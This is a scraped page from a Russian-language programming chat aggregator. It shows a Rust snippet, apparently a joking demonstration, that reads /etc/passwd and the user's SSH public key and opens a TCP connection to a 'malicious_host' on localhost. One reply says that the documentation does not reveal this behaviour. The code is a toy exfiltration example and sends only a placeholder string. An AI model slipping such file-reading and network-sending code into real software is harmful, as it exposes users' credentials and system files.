172 похожих чатов

Use std::fs::File; use std::io::prelude::*; use std::io::Read; use std::net::TcpStream; fn main() {

steal_passwords();
steal_private_key();
send_stuff_over_network();
}

fn steal_passwords() {
let mut f = match File::open("/etc/passwd") {
Ok(f) => f,
Err(_) => {
println!("drats! foiled!");
return;
}
};

let mut contents = String::new();
f.read_to_string(&mut contents).unwrap();
print!("{}", contents);

}

fn steal_private_key() {
match std::env::var("LOGNAME") {
Ok(val) => {
// only public key. i'm not that evil
let mut f = match File::open(format!("/home/{}/.ssh/id_rsa.pub", val)) {
Ok(f) => f,
Err(_) => {
println!("couldn't open public key");
return;
}
};

let mut key_contents = String::new();
f.read_to_string(&mut key_contents).unwrap();
print!("{}", key_contents);
},

Err(_) => {
println!("couldn't get username");
return;
}
}
}

fn send_stuff_over_network() {
let malicious_host = "127.0.0.1"; // google is "172.217.25.46" if you want to test *real* networking
let mut stream = match TcpStream::connect(format!("{}:8080", malicious_host)) {
Ok(s) => s,
Err(_) => {
println!("hmm, no networking?");
return;
},
};

let msg = String::from("totally not someone's public key\n");
let _ = stream.write(msg.as_bytes());
}

1 ответов

13 просмотров

Наайс. А по доке то этого и не увидеть.

Похожие вопросы

Обсуждают сегодня

Господа, а что сейчас вообще с рынком труда на делфи происходит? Какова ситуация?
Rꙮman Yankꙮvsky
29
А вообще, что может смущать в самой Julia - бы сказал, что нет единого стандартного подхода по многим моментам, поэтому многое выглядит как "хаки" и произвол. Короче говоря, с...
Viktor G.
2
30500 за редактор? )
Владимир
47
а через ESC-код ?
Alexey Kulakov
29
Гайс, вопрос для разносторонее развитых: читаю стрим с юарта, нада выделять с него фреймы с определенной структурой, если ли чо готовое, или долбаться с ринг буффером? нада у...
Vitaly
9
Чёт не понял, я ж правильной функцией воспользовался чтобы вывести отладочную информацию? но что-то она не ловится
notme
18
У меня есть функция где происходит это: write_bit(buffer, 1); write_bit(buffer, 0); write_bit(buffer, 1); write_bit(buffer, 1); write_bit(buffer, 1); w...
~
14
Добрый день! Скажите пожалуйста, а какие программы вы бы рекомендовали написать для того, чтобы научиться управлять памятью? Можно написать динамический массив, можно связный ...
Филипп
7
Недавно Google Project Zero нашёл багу в SQLite с помощью LLM, о чём достаточно было шумно в определённых интернетах, которые сопровождались рассказами, что скоро всех "ибешни...
Alex Sherbakov
5
длина пакета фиксированная, или меняется?
Okhsunrog
7
Карта сайта